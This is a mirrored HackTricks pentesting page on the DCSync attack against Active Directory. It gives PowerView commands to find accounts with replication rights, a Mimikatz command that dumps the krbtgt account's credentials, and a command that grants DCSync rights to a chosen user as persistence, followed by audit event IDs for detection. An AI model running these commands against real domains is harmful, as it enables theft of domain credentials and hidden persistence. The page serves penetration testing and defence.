mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-25 12:33:39 +00:00
2.4 KiB
2.4 KiB
DCSync
DCSync
The DCSync permission implies having these permissions over the domain itself: DS-Replication-Get-Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.
Important Notes about DCSync:
- The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol
MS-DRSR
. Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled. - By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.
- If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
Enumeration
Check who has these permissions using powerview
:
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
Exploit
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
Persistence
If you are a domain admin, you can grant this permissions to any user with the help of powerview
:
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
Then, you can check if the user was correctly assigned the 3 privileges looking for them in the output of you should be able to see the names of the privileges inside the "ObjectType" field
:
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
Mitigation
- Security Event ID 4662
Audit Policy for object must be enabled
– An operation was performed on an object - Security Event ID 5136
Audit Policy for object must be enabled
– A directory service object was modified - Security Event ID 4670
Audit Policy for object must be enabled
– Permissions on an object were changed - AD ACL Scanner - Create and compare create reports of ACLs. https://github.com/canix1/ADACLScanner